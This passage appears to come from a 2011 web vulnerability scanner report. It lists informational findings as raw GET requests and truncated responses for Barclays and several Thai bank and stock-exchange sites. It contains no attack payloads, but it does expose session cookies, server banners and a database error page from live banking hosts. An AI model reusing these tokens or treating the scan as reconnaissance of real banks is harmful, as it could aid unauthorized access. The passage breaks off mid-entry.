31.10. https://ibank.barclays.co.uk/olb/w/LoginMember.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/LoginMember.do

Request

GET /olb/w/LoginMember.do HTTP/1.1
Host: ibank.barclays.co.uk
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: olbvisitor=1304385986443869302501514846; tabIndex=1; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304421997884:ss=1304421997884; WLBC=640359596.32800.0000

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:04 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=0000ziQlhDB4stFnSq4TdsC4pxF:r4ap-RolbClusterB-server09; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 10:21:03 GMT; Path=/
Content-Length: 22816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

31.11. https://ibank.barclays.co.uk/olb/w/MobiLoginMember.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/MobiLoginMember.do

Request

GET /olb/w/MobiLoginMember.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:38 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:54:37 GMT; Path=/
Connection: close
Content-Length: 4726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

31.12. https://ibank.barclays.co.uk/olb/w/ReorderPasscodeStandalone.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/ReorderPasscodeStandalone.do

Request

GET /olb/w/ReorderPasscodeStandalone.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:13 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:54:13 GMT; Path=/
Connection: close
Content-Length: 16047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

31.13. https://ibank.barclays.co.uk/olb/w/TakeonPersonal.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/TakeonPersonal.do

Request

GET /olb/w/TakeonPersonal.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:14 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:54:14 GMT; Path=/
Connection: close
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

31.14. https://ibank.barclays.co.uk/olb/w/ViewEStatementHistoryStep1.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/ViewEStatementHistoryStep1.do

Request

GET /olb/w/ViewEStatementHistoryStep1.do HTTP/1.1
Host: ibank.barclays.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: olbvisitor=1304385986443869302501514846; JSESSIONID=00001tZ__0SyocsE7FMgd0siS1d:r4ap-RolbClusterB-server06; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454267474:ss=1304454071727; tabIndex=1; WLBC=640359596.32800.0000; mbox=session#1304436163124-351101#1304438128|check#true#1304436328;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:16 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 12:54:15 GMT; Path=/
Connection: close
Content-Length: 22636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

31.15. https://icustody.bangkokbank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://icustody.bangkokbank.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: icustody.bangkokbank.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2; ASP.NET_SessionId=jlqwxz55hleeiw2kygmq4m45nTTS3qQrk6gG4fiy9midU1ghaZI=

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Date: Tue, 03 May 2011 19:35:16 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

31.16. https://ifunds.bangkokbank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ifunds.bangkokbank.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: ifunds.bangkokbank.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2; ASP.NET_SessionId=wascz1rdf5vkgs45l3tfxozu

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Date: Tue, 03 May 2011 19:34:48 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

31.17. https://ipay.bangkokbank.com/bblscenroll/Resources/privacy.html+Bangkok+Bank+Internet+Log/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ipay.bangkokbank.com
Path:   /bblscenroll/Resources/privacy.html+Bangkok+Bank+Internet+Log/x26amp

Request

GET /bblscenroll/Resources/privacy.html+Bangkok+Bank+Internet+Log/x26amp HTTP/1.1
Host: ipay.bangkokbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Date: Tue, 03 May 2011 12:54:13 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

31.18. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 03 May 2011 13:24:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...

31.19. http://jscrollpane.kelvinluck.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jscrollpane.kelvinluck.com
Path:   /

Request

GET / HTTP/1.1
Host: jscrollpane.kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:19 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 09:42:16 GMT
ETag: "74ba63a-3abc-49a946a4b4e00"
Accept-Ranges: bytes
Content-Length: 15036
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
       "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>

       <title>jScrollPane - cross browser styleable scrollbars with jQuery and CSS</
...[SNIP]...

31.20. https://ksupplychain.kasikornbank.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ksupplychain.kasikornbank.com
Path:   /

Request

GET / HTTP/1.1
Host: ksupplychain.kasikornbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 03 May 2011 12:54:31 GMT
Content-length: 90
Content-type: text/html
Last-modified: Wed, 13 Aug 2008 12:03:48 GMT
Etag: "5a-48a2cda4"
Accept-ranges: bytes
Connection: close

<script>window.location="https://ksupplychain.kasikornbank.com/html/index.html";</script>

31.21. http://m1645.ic-live.com/515/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m1645.ic-live.com
Path:   /515/

Request

GET /515/ HTTP/1.1
Host: m1645.ic-live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: W/"1398-1286564296000"
Last-Modified: Fri, 08 Oct 2010 18:58:16 GMT
Content-Type: text/html
Content-Length: 1398
Date: Tue, 03 May 2011 13:23:50 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>
<title>The Requested Page Was Not Found</title>
</head>
<body>
<h3>The file you requested could not be found.</h3>
<p>The URL your are sear
...[SNIP]...

31.22. http://moneytalk.scb.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /

Request

GET / HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 13:24:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 764
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=GEOJLEJDGIKJLKHHJGMGMDID; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=
...[SNIP]...

31.23. http://moneytalk.scb.co.th/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /en/

Request

GET /en/ HTTP/1.1
Referer: http://moneytalk.scb.co.th/en/moneytalk-home.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: moneytalk.scb.co.th
Cookie: ASPSESSIONIDQSSRQSAA=ACHFIDBAAFFBANICCGIILODG
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:24:09 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

31.24. http://moneytalk.scb.co.th/en/include/bank-online.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /en/include/bank-online.html

Request

GET /en/include/bank-online.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 393
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/en/include/bank-online.html
Last-Modified: Wed, 09 Dec 2009 14:15:06 GMT
Accept-Ranges: bytes
ETag: "011b01da78ca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:07:16 GMT

...<ul>
   <li><a href="http://www.scbeasy.com" target="_blank">EASY NET</a></li>
<li><a href="http://www.scbbusinessnet.com" target="_blank">BUSINESS NET</a></li>
<li><a href="http://www.scb-f
...[SNIP]...

31.25. http://moneytalk.scb.co.th/en/include/footer.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /en/include/footer.html

Request

GET /en/include/footer.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 1398
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/en/include/footer.html
Last-Modified: Wed, 27 Jan 2010 09:45:06 GMT
Accept-Ranges: bytes
ETag: "0fdf967359fca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:07:16 GMT

<link href="../../css/style.txt" rel="stylesheet" type="text/css">
<table width="1060" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="right"><table width="100%" border="0" cellsp
...[SNIP]...

31.26. http://moneytalk.scb.co.th/en/include/scb-quick-link.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /en/include/scb-quick-link.html

Request

GET /en/include/scb-quick-link.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 1376
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/en/include/scb-quick-link.html
Last-Modified: Tue, 26 Jan 2010 02:39:08 GMT
Accept-Ranges: bytes
ETag: "0eecebb309eca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:07:16 GMT

...<ul>
   <li><a href="http://www.scb.co.th/th/oth/rate.shtml" target="_blank">Interest Rates and Fees</a></li>
<li><a href="http://www.scb.co.th/scb_api/index.jsp" target="_blank">Exchanges Rate
...[SNIP]...

31.27. http://moneytalk.scb.co.th/th/include/bank-online.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /th/include/bank-online.html

Request

GET /th/include/bank-online.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 393
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/th/include/bank-online.html
Last-Modified: Wed, 09 Dec 2009 14:14:22 GMT
Accept-Ranges: bytes
ETag: "03376e7d978ca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:04:00 GMT

...<ul>
   <li><a href="http://www.scbeasy.com" target="_blank">EASY NET</a></li>
<li><a href="http://www.scbbusinessnet.com" target="_blank">BUSINESS NET</a></li>
<li><a href="http://www.scb-f
...[SNIP]...

31.28. http://moneytalk.scb.co.th/th/include/footer.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /th/include/footer.html

Request

GET /th/include/footer.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 1574
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/th/include/footer.html
Last-Modified: Wed, 27 Jan 2010 09:43:26 GMT
Accept-Ranges: bytes
ETag: "0335f2c359fca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:04:02 GMT

<link href="../../css/style.txt" rel="stylesheet" type="text/css">
<table width="1060" border="0" cellspacing="0" cellpadding="0">
<tr>
<td align="right"><table width="100%" border="0" cellsp
...[SNIP]...

31.29. http://moneytalk.scb.co.th/th/include/scb-quick-link.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /th/include/scb-quick-link.html

Request

GET /th/include/scb-quick-link.html HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 1705
Content-Type: text/html
Content-Location: http://moneytalk.scb.co.th/th/include/scb-quick-link.html
Last-Modified: Tue, 26 Jan 2010 02:38:52 GMT
Accept-Ranges: bytes
ETag: "08645b2309eca1:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:04:02 GMT

...<ul>
   <li><a href="http://www.scb.co.th/th/oth/rate.shtml" target="_blank">....................................................................................</a></li>
<li><a href="http://ww
...[SNIP]...

31.30. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&elqGUID=&siteid=738&ref=http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534&ref2=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg%26domain=formlessnetworking.com&tzo=360&ms=667 HTTP/1.1
Host: now.eloqua.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534
Cookie: ELOQUA=GUID=1DA3340F1C23453982F3CB2F3806B4F8; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 13:32:01 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

31.31. http://register2.set.or.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /

Request

GET / HTTP/1.1
Host: register2.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASP.NET_SessionId=2nr0a545weyfl4ivrwijkwi5

Response

HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:53:12 GMT
Connection: close
Content-Type: text/html
Content-Length: 172

<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>

31.32. http://www.bangkokbank.com/_layouts/NR/JavaScript/truehitsstat.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /_layouts/NR/JavaScript/truehitsstat.asp

Request

GET /_layouts/NR/JavaScript/truehitsstat.asp?pagename=Home-En HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 443
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTTCQT=PFGICGIDJBLAOOFHIKHEOBNN; path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:44:51 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMsSf ])

<script language='javascript1.1'>
   page='Home-En';
</script>
<script language='javascript1.1' src='http://hits.truehits.in.th/data/k0019767.js'> </script>
<NOSCRIPT>
<a target="_blank" href="
...[SNIP]...

31.33. http://www.barclays.com/importantinfo/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclays.com
Path:   /importantinfo/

Request

GET /importantinfo/ HTTP/1.1
Host: www.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=68; __unam=2099162-12fb6735ea2-70159163-3; WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454115176:ss=1304454046661; ssuserid=173.193.214.243.1304418120024935

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:02 GMT
Server: Apache
Cache-Control: max-age=3600, must-revalidate
Content-Length: 3246
Content-Type: text/html

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en">
<head>
<title>Barclays : Important Information (new window)</title>
<meta name="WT.sp" content="barcomgrp" />
<meta nam
...[SNIP]...

31.34. http://www.kasikornbank.com/Pages/truehitsstat.html  previous  next

Summary
